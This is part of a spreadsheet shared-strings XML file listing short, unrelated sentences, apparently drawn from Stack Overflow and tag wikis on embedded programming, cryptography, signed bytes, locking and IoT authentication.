    <t>Before generating certs, IPLIST (subject alternative names) environment variable was defined with the IP of the NodeMCU.</t>
  </si>
  <si>
    <t>So compared to 802.15.4, Bluetooth shows a much shorter communication range which means more device maybe used to build a network.</t>
  </si>
  <si>
    <t>In this type of attack, the program goes through all the possible plaintexts, hashing each one and then comparing it to the input hash.</t>
  </si>
  <si>
    <t>Permissions can be divided into three general groups : User Data Permissions , Friends' Data Permissions , and Extended Permissions.</t>
  </si>
  <si>
    <t>The IV name is common enough to be abused for other modes of encryption that require random input, e.g.</t>
  </si>
  <si>
    <t>This technique abuses the high side ESD protection diode on the input pad to clamp the voltage to something below Vih.</t>
  </si>
  <si>
    <t>Unfortunately, once you wrote an invalid value to the access conditions field, the whole sector becomes inaccessible and there is no way to reverse this condition.</t>
  </si>
  <si>
    <t>An Object Document Mapper (ODM) library like MongoTor, built on Motor, provides higher-level features like schema validation.</t>
  </si>
  <si>
    <t>- Second Source Code protection: 
1- usually depending on JAVA or C#.NET for the Compiler to byte code or lower and  its VM sandbox / Framework.</t>
  </si>
  <si>
    <t>One solution that might work is basically using a stream cipher to ensure the integrity of the whole data "stream".</t>
  </si>
  <si>
    <t>Only SharePlex 
provides data compare and repair, 
inflight data integrity, plus monitoring 
and alerting functionalities  all in 
one solution.</t>
  </si>
  <si>
    <t>The term FIPS is sometimes used to refer to a specific publication, Security Requirements for Cryptographic Modules FIPS 140.</t>
  </si>
  <si>
    <t>If it does not, you most probably have a firewall blocking outgoing SSH connections on this box, or your RP itself is blocking incoming connections.</t>
  </si>
  <si>
    <t>Wire header: Wire Library
Linux i2C-dev.h: Using IC from userspace in Linux
Specifically, I can't see how I can do a 
Linux does not appear to have the equivalent of requesting a specific number of bytes from a IC device.</t>
  </si>
  <si>
    <t>Even a timestamped and UUID 1024bit AES token/JWT like thing could be used on startup to verify the build?</t>
  </si>
  <si>
    <t>Tables are usually used in recovering the plaintext password, up to a certain length consisting of a limited set of characters.</t>
  </si>
  <si>
    <t>Master devices such as DMA, or multi-core devices can also be TrustZone aware or the bus master can be set to provide boot time locked access.</t>
  </si>
  <si>
    <t>When the innodb engine was released it became popular quickly, in no small part because it offered row locking.</t>
  </si>
  <si>
    <t>It appears(if there isn't a bug in my test), that the following function:
will be resistant to that kind of lockup, because any non-zero state of y will produce a change to some random value, and any state that is zero will be XORed to something else by the key.</t>
  </si>
  <si>
    <t>Additional information 3: There are NO unique keys as the SELECT statement will look for a match in the column which are just hash values, which apparently have collisions.</t>
  </si>
  <si>
    <t>I'm implementing a google sign in as explained here:
https://developers.google.com/identity/sign-in/android/sign-in
The whole process works, but it works very very slow.</t>
  </si>
  <si>
    <t>For example, you can implement the previous example using AsyncTask this way:
Now the UI is safe and the code is simpler, because it separates the work into the part that should be done on a worker thread and the part that should be done on the UI thread.</t>
  </si>
  <si>
    <t>Because the 9th bit is not data but carry control information, you can enable parity checking when configuring serial port.</t>
  </si>
  <si>
    <t>Sign-up is a common feature known in web applications that allows defined list(s) of users to be attended to some special features of the application by the process of signing-up.</t>
  </si>
  <si>
    <t>Higher level components, representing both the standard SSH client and SSH servers, are provided which implement the protocol specification for user sessions and port forwarding.</t>
  </si>
  <si>
    <t>Typical security requirements may include specific elements of confidentiality, integrity, authentication, availability, authorization and non-repudiation.</t>
  </si>
  <si>
    <t>In computer science, the subset sum problem is one of the important problems in complexity theory and cryptography.</t>
  </si>
  <si>
    <t>Now Checkstyle provides checks that find class design problems, duplicate code, or bug patterns like double checked locking.</t>
  </si>
  <si>
    <t>Ultimately, I'd like to use a longer, random string as a key--in place of "hello"--allowing me to activate a connected component from a device that has stored the secret (e.g.</t>
  </si>
  <si>
    <t>The gcloud command that is used to block communication: https://cloud.google.com/iot/docs/gcloud-examples#block_or_allow_communication_from_a_device
The Patch API doesn't make it clear how one can block communication of a device using the API
So how is this achieved?</t>
  </si>
  <si>
    <t>I am trying to  send 29bit EFF CAN messages over socket can, but for some reason it sends them with 11bit identifier cutting off 5 bytes from ID.</t>
  </si>
  <si>
    <t>The tricky part is that no matter what, since you need to use the password, (and I'm assuming you can't enter a key every time you boot) your code is going to contain both the lock, and the key to opening it.</t>
  </si>
  <si>
    <t>You can try using  if your platform supports it, otherwise you must make the input stream non-blocking ("raw") which again is highly platform-dependent code.</t>
  </si>
  <si>
    <t>Which is not expensive as you think (It uses a stream cipher, the expensive part is the handshake and every server today support Connection: Keep-Alive).</t>
  </si>
  <si>
    <t>So you can lock the entire camera-off operation as a unit until it completes before allowing the event processing thread to check the value of the flag.</t>
  </si>
  <si>
    <t>Coded Character Set Identifier (CCSID) is a 16-bit number that represents a specific encoding of a specific code page.</t>
  </si>
  <si>
    <t>Topaz electronic signature capture devices are a USB or Serial device that allow an end user to write their signature on a small input device.</t>
  </si>
  <si>
    <t>The client cannot be guaranteed that the operation has been carried out, even if the status code returned from the origin server indicates that the action has been completed successfully.</t>
  </si>
  <si>
    <t>Normally for 1-byte values atomic access guards are not required here...
Update: read the "Atomic access" section here: http://www.gammon.com.au/interrupts.</t>
  </si>
  <si>
    <t>You can purchase the U2F key of your choice from a range of vendors
2 standards were created to envision a world without passwords:
YubiKey (dongle)
UAF (fingerprint, like iPhone 6)
YubiKey is a dongle that users carry to authenticate themselves.</t>
  </si>
  <si>
    <t>It allows users to administer their own public/private key pairs and associated certificates for use in self-authentication (where the user authenticates himself/herself to other users/services) or data integrity and authentication services, using digital signatures.</t>
  </si>
  <si>
    <t>However, running it inside of the Lambda function does generate an assumed role and does generate a set of temporary credentials but the resulting signature will not establish a connection to the AWS IOT endpoint.</t>
  </si>
  <si>
    <t>I would add the maxTemp functionality to the irCounter thread, so that accessing it from only a single thread; and update a global variable (protected by a lock) with the maxTemp results if you need to retain this functionality.</t>
  </si>
  <si>
    <t>We have preferences for, but you may not, 
autostart, 
-n Don't wait for a client 
-G to listen on all addresses, 
-b Broken-device-safety mode, and 
autofind
The resultant configuration file looks like
The primary stumbling block with this approach while gpsd is running in this fashion is it will grab the gps before you can.</t>
  </si>
  <si>
    <t>Is it signed or unsigned?</t>
  </si>
  <si>
    <t>So how does this signed and unsigned byte work out between java and arduino?</t>
  </si>
  <si>
    <t>When I try to encrypt 128 bytes of data, only 128 bits of it get encrypted.</t>
  </si>
  <si>
    <t>That's 1 GB/s encryption speed.</t>
  </si>
  <si>
    <t>I want to connect my ESP8266 to a server that is encrypted with Sha2 256 Bits.</t>
  </si>
  <si>
    <t>I thought perhaps 7 is the decimal representation of 0000000000000111 - but I don't think this can be right.</t>
  </si>
  <si>
    <t>I always thought, that a char is an unsigned byte under all circumstances.</t>
  </si>
  <si>
    <t>Yes, I am aware of security implications about this.</t>
  </si>
  <si>
    <t>I was looking through Google on how to secure Apache long story short.</t>
  </si>
  <si>
    <t>First of all, I want to know whether it is possible to encrypt RAM in Raspberry Pi.</t>
  </si>
  <si>
    <t>I tried to use an MD5 hash, but it seems it's only a one way encryption.</t>
  </si>
  <si>
    <t>A 16-bit signed value can be from -32768 to 32767.</t>
  </si>
  <si>
    <t>It doesn't have any concept of signed or unsigned.</t>
  </si>
  <si>
    <t>64 bytes),
  without cryptographic security.</t>
  </si>
  <si>
    <t>About second question:
/int8_t is same as unsigned/signed char and cout will handli it as char.</t>
  </si>
  <si>
    <t>In C 'char' can be both signed or unsigned.</t>
  </si>
  <si>
    <t>A char in C is -128 to 127 (signed), you probably want it to be 0-255 and then it has to be unsigned.</t>
  </si>
  <si>
    <t>Later on you can increase your security level.</t>
  </si>
  <si>
    <t>A  in Arduino is 32 bits unsigned or signed.</t>
  </si>
  <si>
    <t>bitMask == 0x10):
    out 52-0x20,r20    // PORTD = offPixel
    ldi r23,lo8(1)
    sbrs r24,4         // 4th bit (the number goes from 7 to 0)
    ldi r23,lo8(0)     // toSend = 0/1 (?</t>
  </si>
  <si>
    <t>Bytes are signed in Java with a value range from -128 to 127, that's why you see -128.</t>
  </si>
  <si>
    <t>The java bytes are signed, while the C# bytes are not.</t>
  </si>
  <si>
    <t>Using only  cipher without IV implies using AES/ECB/PKCS5Padding.</t>
  </si>
  <si>
    <t>example for 16bytes: 
1234567890123456
MTIzNDU2Nzg5MDEyMzQ1Ng==
I do recommend to use a SHA256CryptoServiceProvider.ComputeHash of the secret string for your device symmetric keys, for example:
secret string: hello
primary key: LPJNul+wow4m6DsqxbninhsWHlwfp0JecwQzYpOLmCQ=</t>
  </si>
  <si>
    <t>The secret is to not shift it.</t>
  </si>
  <si>
    <t>CBC Mode is cipher block chaining.</t>
  </si>
  <si>
    <t>A hash-of-hashes is a multi-dimensional hash that contains nested hashes.</t>
  </si>
  <si>
    <t>The contents of the cookie is signed and encrypted.</t>
  </si>
  <si>
    <t>Camellia is a 128 bit block cipher.</t>
  </si>
  <si>
    <t>In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users.</t>
  </si>
  <si>
    <t>NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users.</t>
  </si>
  <si>
    <t>Its primary competitors have been ACF2 and TopSecret, both now produced by CA, Inc.</t>
  </si>
  <si>
    <t>Supports 3des-cbc, aes128-cbc, aes192-cbc, aes256-cbc, aes128-ctr, aes192-ctr, aes256-ctr, blowfish-cbc, cast128-cbc, arcfour and twofish encryptions.</t>
  </si>
  <si>
    <t>Supports hmac-md5, hmac-sha1, hmac-ripemd160, hmac-sha2-256, hmac-sha2-256-96, hmac-md5-96 and hmac-sha1-96 hashing algorithms.</t>
  </si>
  <si>
    <t>The DLM is used not only for file locking but also for coordination of all disk access.</t>
  </si>
  <si>
    <t>Under Microsoft Windows, LUKS-encrypted disks can be used with LibreCrypt (formerly DoxBox).</t>
  </si>
  <si>
    <t>You could consider textbook RSA as a toy cipher.</t>
  </si>
  <si>
    <t>RSA can be used for both encryption and signature.</t>
  </si>
  <si>
    <t>add_authenticator
Indicates whether an authenticator will be encrypted together with the cleartext.</t>
  </si>
  <si>
    <t>@add_authenticator
Indicates whether an authenticator will be encrypted together with the cleartext.</t>
  </si>
  <si>
    <t>SHA1, SHA2, SHA3) and password hashing algorithms (e.g.</t>
  </si>
  <si>
    <t>for logins), you should look at hashing instead of encryption.</t>
  </si>
  <si>
    <t>cryptographic digests).</t>
  </si>
  <si>
    <t>Arduino int is a signed 16-bit int, -32768 -&gt; 32767.</t>
  </si>
  <si>
    <t>My circuit can be seen here:
Attiny85 dimming circuit controlled over I2C
The opto-isolator (and thus the triac) is controlled via pin 2 (AKA PB3, AKA PCINT3) and AC zero cross detection is done on pin 3 (AKA PB4, AKA PCINT4) on the Attiny85
The code uses Pin Change Interrupt Enable rather than the single External Interrupt Enable because the External Interrupt pin is pin 7 (aka PB2) which is used as the SCL for the I2C communication.</t>
  </si>
  <si>
    <t>I would be very happy if I could get a small box which can be access by any device with Wi-Fi capabilities with ssh, vncviewer.</t>
  </si>
  <si>
    <t>In your case:  will "mask" all but the lowest bit.</t>
  </si>
  <si>
    <t>It's possible that your SIM900 is in "Result Codes Suppressed" mode.</t>
  </si>
  <si>
    <t>The error you receive indicates that authentication with key A of the NDEF application () was not possible for sector 1 (typically the first sector of the NDEF application).</t>
  </si>
  <si>
    <t>In cryptography and computer security, a root certificate is either an unsigned public key certificate or a self-signed certificate that identifies the Root Certificate Authority (CA).</t>
  </si>
  <si>
    <t>This standard belong to the Public-Key Cryptography Standards (PKCS) family published by RSA Laboratories.</t>
  </si>
  <si>
    <t>Is there any different method for calculating key for security access service except taking 2's complement.If it is so please explain</t>
  </si>
  <si>
    <t>Also, there may be a need to set the security level to something lower than high:
[EA:FB:B5:CE:B0:13][LE]&gt; sec-level medium</t>
  </si>
  <si>
    <t>Finally, [here] (github.com/arpitchauhan/cryptographic-protocols-arduino-and-PC) are demonstrated some cryptographic procolos for Arduino, including key exchange using RSA.</t>
  </si>
  <si>
    <t>What you have to run depends on whether you also have websites running on Apache you want to generate Let's Encrypt certs for.</t>
  </si>
  <si>
    <t>This methods streams an json string with all available networks SSIDs, it signal levels and security modes.</t>
  </si>
  <si>
    <t>This seed value could be a password or the secret generated by a Diffie Hellman key derivation function.</t>
  </si>
  <si>
    <t>RSA SecurID and RSA SecurID Access Authenticator Tokencode both employ a one-time, randomly generated number called a tokencode.</t>
  </si>
  <si>
    <t>In Public Key Infrastructure cryptography a CSR is a Certificate Signing Request.</t>
  </si>
  <si>
    <t>I finally came up with something that actually does the job in a bit less than 100 lines of very obfuscated code.</t>
  </si>
  <si>
    <t>In the case of pillar table, number 1 is unique identifier - Element ID.</t>
  </si>
  <si>
    <t>The same would apply if that hardware would, for example, always do "encrypt(input bytes + timestamp)".</t>
  </si>
  <si>
    <t>The returned data should be unpredictable enough for cryptographic applications, though its exact quality depends on the OS implementation.</t>
  </si>
  <si>
    <t>In recent versions of PHP, mail() is no longer vulnerable to e-mail header injection through the subject line or receiver, as it removes all the control characters, but you may want to make sure the receiver's list doesn't include multiple addresses if that's not what you desire.</t>
  </si>
  <si>
    <t>Question 2: does anyone have some hints for me on lockless reads of memory blocks on ARM Cortex M3?</t>
  </si>
  <si>
    <t>ISO-3166 standard defining 2 and 3 character identifiers for each country in the world.</t>
  </si>
  <si>
    <t>In asymmetric encryption, also referred as public-key cryptography, there are two related keys--a key pair.</t>
  </si>
  <si>
    <t>Checkboxes are typically used to represent features in an application that can be enabled or disabled without affecting others.</t>
  </si>
  <si>
    <t>these operations may require elevated permissions, special knowledge, or a limited user base.</t>
  </si>
  <si>
    <t>The JWE JSON Serialization represents JWEs
as JSON objects and enables the same content to be encrypted to
multiple parties.</t>
  </si>
  <si>
    <t>NameNode allows multiple Checkpoint nodes simultaneously, as long as there are no Backup nodes registered with the system.</t>
  </si>
  <si>
    <t>How can I send the data to database while preventing malicious attackers from altering the data in my database?</t>
  </si>
  <si>
    <t>Also note that when in non-blocking mode, less data than what was requested may be returned, even if no size parameter was given.</t>
  </si>
  <si>
    <t>A combination of static and dynamic validation allows JavaScript engines to employ an ahead-of-time (AOT) optimizing compilation strategy for valid asm.js code.</t>
  </si>
  <si>
    <t>So I convert it with a code found on the net :
But the problem is that the file get is like this : (afinfo)
and I need a file like this :
File type ID:   WAVE
Num Tracks:     1
----
Data format:     1 ch,  16000 Hz, 'lpcm' (0x0000000C) 16-bit little-endian signed integer
           no channel layout.</t>
  </si>
  <si>
    <t>The pipes will maintain the integrity of the packets as long as you open their procedure end in Unbuffered mode.</t>
  </si>
  <si>
    <t>This exceeds the capability of the
Cell-Level Encryption feature of MS SQL, which processes plaintext
data within the DBMS.</t>
  </si>
  <si>
    <t>Security policies are defined for database tables, which create filters that are applied automatically to DML statements.</t>
  </si>
  <si>
    <t>But, to be safe or if you need to ensure the macro gets defined back to its previous definition, you can use the  and pop_macro pragmas (assuming your compiler supports it):
This allows you to temporarily redefine macros for a block of code.</t>
  </si>
  <si>
    <t>You may find an encryption approach that would not increase the payload length too much to find a balance point between energy consumption and security.</t>
  </si>
  <si>
    <t>Ditto is about representing the current state of the digital twin or for communicating directly with the real device both by applying authorization.</t>
  </si>
  <si>
    <t>The Session Initiation Protocol, defined in "RFC 3261", is an application layer signalling protocol for establishing and modifying long-running relationships between two or more peers.</t>
  </si>
  <si>
    <t>KinectInteraction provides the following high-level features:
Identification of up to 2 users and identification and tracking of their primary interaction hand.</t>
  </si>
  <si>
    <t>Not all window messages that are sent from a lower-privilege process to a higher-privilege process are blocked.</t>
  </si>
  <si>
    <t>Gone are system-wide process-locks; ImageSharp images are thread-safe and fully supported in web environments.</t>
  </si>
  <si>
    <t>At the server side, it checks if the last digit equals to the sum of all the previous digit, if yes, it identify the received package is valid.</t>
  </si>
  <si>
    <t>I used this page to enable operations monitoring :
https://docs.microsoft.com/fr-fr/azure/iot-hub/iot-hub-operations-monitoring#a-namehow-to-enable-operations-monitoringacomment-activer-la-surveillance-des-oprations
I switch "cloud-to-device communication" to Verbose.</t>
  </si>
  <si>
    <t>UnicodeDecodeError: 'utf-8' codec can't decode byte 0xfb in position 2: invalid start byte
I found this StackOverflow thread which addresses what I need pretty much exactly, but it seems that the error handling in Python 3 no longer works the same, and throws me this error when I try the solution there: TypeError: 'UnicodeDecodeError' object is not subscriptable.</t>
  </si>
  <si>
    <t>The app I was test driving had and still has some weird behavior when using a password to encrypt content and starting the server with --password 12345678 made everything run very slow.</t>
  </si>
  <si>
    <t>Because a byte's minimum and maximum values are 0-255, there's no safe character we can use to keep track of the three different bytes, so we need a way to figure out where the info we send begins and ends.</t>
  </si>
  <si>
    <t>It plugs in components for specialized processing such as custom authentication, message transformations, compression/decompression, or encryption/decryption of traffic between the devices and IoT Hub.</t>
  </si>
  <si>
    <t>It aims to provide a solution where UDP is too primitive because guaranteed-order packet delivery is desirable, but TCP adds too much complexity/overhead.</t>
  </si>
  <si>
    <t>Caps lock is a lock key found on many computer keyboards, depending on the local keyboard layout they implement.</t>
  </si>
  <si>
    <t>A "GUID Partition Table" (GPT) describes the partitions of a physical hard disk with the use of GUIDs (globally unique identifiers).</t>
  </si>
  <si>
    <t>A checksum or hash sum is a fixed-size datum computed from an arbitrary block of digital data for the purpose of detecting accidental errors that may have been introduced during its transmission or storage.</t>
  </si>
  <si>
    <t>It is responsible for handling the secure attention sequence, typically Control-Alt-Delete, and interacting with the user when this sequence is received.</t>
  </si>
  <si>
    <t>For referential integrity to hold in a relational database, any field in a table that is declared a foreign key can contain either a null value, or only values from a parent table's primary key or a candidate key.</t>
  </si>
  <si>
    <t>Here's why I think I can do a great job:
Every week, I use some queries I wrote to find voting fraud - with a fairly high accuracy rate.</t>
  </si>
  <si>
    <t>Also while decrypting on the raspberry pi side it gives an error saying "the input text must be multiple of 16 in length", when i pad the input( temperature data) with zeroes it still gives the same error message.</t>
  </si>
  <si>
    <t>In a very small number of cases, parts of the API may be modified or removed, although typically such changes are only needed to ensure API robustness and application or system security.</t>
  </si>
  <si>
    <t>Many other concepts also apply on an end-to-end level, such as ensuring that data is encrypted from the moment a user submits it until it reaches a database or other back-end or other similar considerations.</t>
  </si>
  <si>
    <t>The general idea for achieving error detection and correction is to add some redundancy (i.e., some extra data) to a message, which receivers can use to check consistency of the delivered message, and to recover data determined to be corrupted.</t>
  </si>
  <si>
    <t>Besides the RSA algorithm, PKCS #1 v2.1 defines the OAEP padding scheme for encryption, the PSS padding scheme for signature, and the legacy PKCS1-v1.5 scheme for encryption and signature.</t>
  </si>
  <si>
    <t>A composite key can be defined as the primary key.</t>
  </si>
  <si>
    <t>MASTER CODE:
SLAVE CODE:
#ifndef F_CPU
#define F_CPU 8000000UL
#endif
#include &lt;avr/io.h&gt;
#include &lt;avr/interrupt.h&gt;
#include &lt;util/delay.h&gt;
#define CTRL_PORT   DDRB
#define DATA_PORT   PORTB
#define SS_PIN      PB4
#define CLK_PIN     PB2
#define DI_PIN      PB0
#define DO_PIN      PB1
/*
    Initialize USI as slave
*/
void init()
{
    //DO pin is configured for output
    CTRL_PORT |= _BV(DO_PIN);
    //All other pins as input
    CTRL_PORT &amp;= ~(_BV(DI_PIN) | _BV(CLK_PIN) | _BV(SS_PIN));
    DATA_PORT |= _BV(DI_PIN) | _BV(CLK_PIN);
    //Enable USI overflow interrupt, set three wire mode and set
    //  clock to External, positive edge.</t>
  </si>
  <si>
    <t>I'm already done this command jarsigner -verify ATCommandTester_v27.jar
but, I still blocked
screenshot
What have I got to do?</t>
  </si>
  <si>
    <t>I'm working on making a servo run off of an FPGA for a digital lock.</t>
  </si>
  <si>
    <t>And, I'm not sure how to handle signed bytes.</t>
  </si>
  <si>
    <t>I am using PyCryptoDome for the encryption/decryption on Django.</t>
  </si>
  <si>
    <t>It's fair to assume there will only ever be one device connected, but it's not fair to assume what that device is aside from what's necessary for communication.</t>
  </si>
  <si>
    <t>The Java applet would need to be signed, though using a self-signed cert should be alright.</t>
  </si>
  <si>
    <t>If this really does the trick depends, however, on how the cipher handles keys of different lenghts.)</t>
  </si>
  <si>
    <t>It's also possible to encrypt files or directories on the disk while leaving the file-system mountable (but scrambled).</t>
  </si>
  <si>
    <t>BLE provides Integrity and Confidentiality to its communication, but not Authentication.</t>
  </si>
  <si>
    <t>Since it was a signed char (and so its value was -1) it is padded with 1, to preserve the sign.</t>
  </si>
  <si>
    <t>Signed overflow did occur however (S=1), since 0x8a signed means -118.</t>
  </si>
  <si>
    <t>Your best bet is to store it 16-bit signed.</t>
  </si>
  <si>
    <t>So don't use that for cryptography or anything, but scaling for a 10 bit DAC or something is ok.</t>
  </si>
  <si>
    <t>If you need even more insurance it's not just random data, you can do this:
and also write the XOR result between signature and highscore.</t>
  </si>
  <si>
    <t>No valid MBR/FAT-BS signature found in sector 0.</t>
  </si>
  <si>
    <t>Each character in the pass-phrase must have an encoding in the range    of 32 to 126 (decimal), inclusive.</t>
  </si>
  <si>
    <t>There is no limitation on the number of devices, certificates or policies you can have.</t>
  </si>
  <si>
    <t>They specify which bit to lock when, usually after upload the code:)</t>
  </si>
  <si>
    <t>-106 is a signed byte corresponding to 150 as unsigned.</t>
  </si>
  <si>
    <t>We don't call getCredentialsForIdentity() anywhere, and trying to insert it produced the same error you're getting.</t>
  </si>
  <si>
    <t>However, the lack of accounts on a device will still block you.</t>
  </si>
  <si>
    <t>I can reproduce this behavior when I trying register the TPM device.</t>
  </si>
  <si>
    <t>SHA-1 vulnerability only affects signing algorithm, not thumbprint!</t>
  </si>
  <si>
    <t>Byte format is signed.</t>
  </si>
  <si>
    <t>And using x509 certificate for x509 self-signed or x509 CA signed authenticated device also supported.</t>
  </si>
  <si>
    <t>First thing to know is that  on arduino is coded on two bytes, and it is signed.</t>
  </si>
  <si>
    <t>SPI_FLASH_SEC_SIZE is set to 4096 because that's the sector size.</t>
  </si>
  <si>
    <t>If you want to use webrtc but your own signalling, you can do proxy over inbuilt signalling.</t>
  </si>
  <si>
    <t>: "rsa_private.pem") in my code to sign the JWT.</t>
  </si>
  <si>
    <t>The Java implementation of OpenBSD's Blowfish password hashing code.</t>
  </si>
  <si>
    <t>Encryption and decryption are performed on the fly.</t>
  </si>
  <si>
    <t>A JSON Web Key is a JSON data structure that represents a cryptographic key.</t>
  </si>
  <si>
    <t>Argon2 is a hashing algorithm, primarily for password hashing.</t>
  </si>
  <si>
    <t>Cause: An UPDATE or INSERT statement attempted to insert a duplicate key.</t>
  </si>
  <si>
    <t>for logins), you should look at password hashing instead of encryption.</t>
  </si>
  <si>
    <t>Rhino Security is a row level security framework for NHibernate.</t>
  </si>
  <si>
    <t>It provides access to most major cryptographic algorithms.</t>
  </si>
  <si>
    <t>SHA (Secure Hash Algorithm) is a family of digest algorithms (i.e.</t>
  </si>
  <si>
    <t>Symmetric encryption is the oldest and best-known technique.</t>
  </si>
  <si>
    <t>Anyone who knows the key can either encrypt or decrypt a message.</t>
  </si>
  <si>
    <t>Locking and unlocking user accounts.</t>
  </si>
  <si>
    <t>It is guaranteed to be thread-safe.</t>
  </si>
  <si>
    <t>Both assemblies must be unsigned or both must be signed.</t>
  </si>
  <si>
    <t>Primary keys are mandatory for every table.</t>
  </si>
  <si>
    <t>The algorithm used to sign the license file is RSA which is an asymmetric algorithm.</t>
  </si>
  <si>
    <t>One well known example of such an algorithm is bcrypt, which is based on the Blowfish cipher.</t>
  </si>
  <si>
    <t>NA can be coerced to any other vector type except raw.</t>
  </si>
  <si>
    <t>It just assumes some structure that contains two locks.</t>
  </si>
  <si>
    <t>For hashing (one-way encryption) check out php-password-hash</t>
  </si>
  <si>
    <t>It is not, however, thread-safe under modification.</t>
  </si>
  <si>
    <t>This dictionary of hashes is referred to as a rainbow table.</t>
  </si>
  <si>
    <t>Signatures fit into 64 bytes.</t>
  </si>
  <si>
    <t>Used to sign and/or encrypt messages under a PKI.</t>
  </si>
  <si>
    <t>A JSON Web Key (JWK) is a JavaScript Object Notation (JSON) data structure that represents a cryptographic key.</t>
  </si>
  <si>
    <t>Is char signed or unsigned by default?</t>
  </si>
  <si>
    <t>For Java PlugIn and Java WebStart, see Oracle's Mixing Signed and Unsigned Code guide.</t>
  </si>
  <si>
    <t>Syntax
Arguments
key_GUID
Is the GUID of the key to be used to encrypt the cleartext.</t>
  </si>
  <si>
    <t>JAR files can also be signed with a certificate to prevent unathorized modification.</t>
  </si>
  <si>
    <t>Features:
JSch is in pure Java, but it depends on Java Cryptography Extension (JCE).</t>
  </si>
  <si>
    <t>An SSH Key can be visualized by formatting the byte sequence into ASCII art.</t>
  </si>
  <si>
    <t>Signature algorithms supported by SignerUtilities: MD2withRSA, MD4withRSA, MD5withRSA, RIPEMD128withRSA, RIPEMD160withRSA, RIPEMD256withRSA, SHA-1withRSA, SHA-224withRSA, SHA-256withRSAandMGF1, SHA-384withRSAandMGF1, SHA-512withRSAandMGF1, SHA-1withDSA, and SHA-1withECDSA.</t>
  </si>
  <si>
    <t>CanonicalizationMethod - Defines the canonicalization algorithm to be used before calculating the signature of the SignedInfo element.</t>
  </si>
  <si>
    <t>GnuPG allows encryption and signing of data and communication.</t>
  </si>
  <si>
    <t>SHA is a family of cryptographic hash functions (i.e.</t>
  </si>
  <si>
    <t>However, using this value, or a key consisting of all-zero bytes, I can't authenticate to the block.</t>
  </si>
  <si>
    <t>This can be worked around by forcing the compiler to use value as signed:
values[i] = SCALEFACTOR * (long)value;
And now it should be working.</t>
  </si>
  <si>
    <t>xmlseclibs is a library written in PHP for working with XML Encryption and Signatures.</t>
  </si>
  <si>
    <t>Generates and checks file hashes for locked dependencies.</t>
  </si>
  <si>
    <t>An MD5 hash is typically expressed as a 32-digit hexadecimal number.</t>
  </si>
  <si>
    <t>Password-based encryption (PBE) is a symmetric encryption used to protect data stored on a device.</t>
  </si>
  <si>
    <t>It adds a number of new features like generators, the finally keyword and a new password API.</t>
  </si>
  <si>
    <t>7 (SS7) is a family of protocols used for signaling in most public telephone networks.</t>
  </si>
  <si>
    <t>The javax.crypto package contains standard java classes for various cryptographic operations.</t>
  </si>
  <si>
    <t>The result is of type , which is guaranteed to be an unsigned type.</t>
  </si>
  <si>
    <t>But please note that this is kind of a "dirty hack", it is poorly-specified behavior in theory.</t>
  </si>
  <si>
    <t>Subresource Integrity is implemented in multiple browsers and tools to help you use it, such at the SRI Hash Generator are also available.</t>
  </si>
  <si>
    <t>If I can trust all those on my network of there are multiple editors of the same data, I may not care about authenticity or non-repudiation.</t>
  </si>
  <si>
    <t>Question 2 - The size(sizeOfUsername) of the char array username can also change depending upon the length of the username read from the eeprom.</t>
  </si>
  <si>
    <t>The Arduino tutorial Lesson 4 - Serial communication and playing with data says that the Arduino stores signed ints in two bytes (16 bits).</t>
  </si>
  <si>
    <t>Specifically, the problem is that different implementations create different results for encrypting the same plaintext and key.</t>
  </si>
  <si>
    <t>pHash or perceptual hash is an algorithm for creating fingerprints of multimedia data (images, audio, etc).</t>
  </si>
  <si>
    <t>Like HashSet, LinkedHashSet is not thread safe, so access by multiple threads must be synchronized by an external mechanism such as synchronizedSet(Set).</t>
  </si>
  <si>
    <t>ProGuard runs only when you build your application in release mode, so you do not have to deal with obfuscated code when you build your application in debug mode.</t>
  </si>
  <si>
    <t>Encrypting data in transit also helps to secure it as it is often difficult to physically secure all access to networks.</t>
  </si>
  <si>
    <t>For testing purposes, I want to print my public and private key which are generated on the Arduino via elliptic curve.</t>
  </si>
  <si>
    <t>A specification contained in a document which lays down the characteristics required of a product such as levels of quality, performance, interoperability, safety or dimensions.</t>
  </si>
  <si>
    <t>But i notice a lot of latency it takes a second for the updated sensor values to be registered by my application, protocol runs at a baud rate of 57600.</t>
  </si>
  <si>
    <t>I have problems regarding initializing equivalent "initialization vectors" for the encryption of my message.</t>
  </si>
  <si>
    <t>Opening a connection per user can be unfeasible in a publicly-hosted Internet application where the number of simultaneous users can be very large.</t>
  </si>
  <si>
    <t>From the guide: By default, the Device Provisioning Service creates new symmetric keys with a default length of 32 bytes.</t>
  </si>
  <si>
    <t>You don't even need to have the target box physically available as long as you can reach it through the network/internet (assuming it is correctly secured).</t>
  </si>
  <si>
    <t>Having the decryption key on the card directly enforces, that without card and PIN knowledge just the encrypted message is available.</t>
  </si>
  <si>
    <t>The software never reads or writes data from secret addresses in RAM; the pattern of addresses is completely predictable.</t>
  </si>
  <si>
    <t>It is a good idea to design your own header and check sum to ensure data integrity but I don't bother with check sums for simple unimportant projects.</t>
  </si>
  <si>
    <t>Another possibility is to make the local buffer static; but beware that the function will no longer be reentrant or thread-safe, which could lead to weird bugs.</t>
  </si>
  <si>
    <t>unless you have some way for them to sign in ( a screen )
or they sign in on another device (an android app) and you send the credentials over the RPi
Then Firebase Anonymous auth is your best bet, allowing sign in without user interaction.</t>
  </si>
  <si>
    <t>A cipher is a code translating information into a less recognizable form, with the goal of limiting the set of systems or individuals capable of receiving the original data when given the enciphered representation.</t>
  </si>
  <si>
    <t>It can do four main kinds of things (plus other things in support of these) to help you catch bugs in the act: 
Start your script, specifying anything that might affect its behavior.</t>
  </si>
  <si>
    <t>You must configure a digital certificate on your application server with the following characteristics:
Installed in the user ("MY") certificate store
RSA-based
Has a friendly name of "SecurEntity"
Private key is archived for disaster recovery purposes</t>
  </si>
  <si>
    <t>The beacons themselves come in a number of different formats, including small coin cell powered devices, USB sticks and software versions.</t>
  </si>
  <si>
    <t>RESTful web services)
download and/or process files
encoding audio/video
and any kind of task that could block the main thread.</t>
  </si>
  <si>
    <t>Simply put, referential integrity means that when a field in a table refers to a corresponding field in another table, that corresponding record must exist.</t>
  </si>
  <si>
    <t>The cryptographic algorithms themselves are public, if only because nobody can really tell "how much" a given algorithm is secret, since algorithms are often implemented as software or hardware systems which are duplicated into many instances, and the cost of reverse engineering is hard to estimate.</t>
  </si>
  <si>
    <t>I have some problem with decrypting text:
My backend often throws IllegalBlockSizeException during decryption:
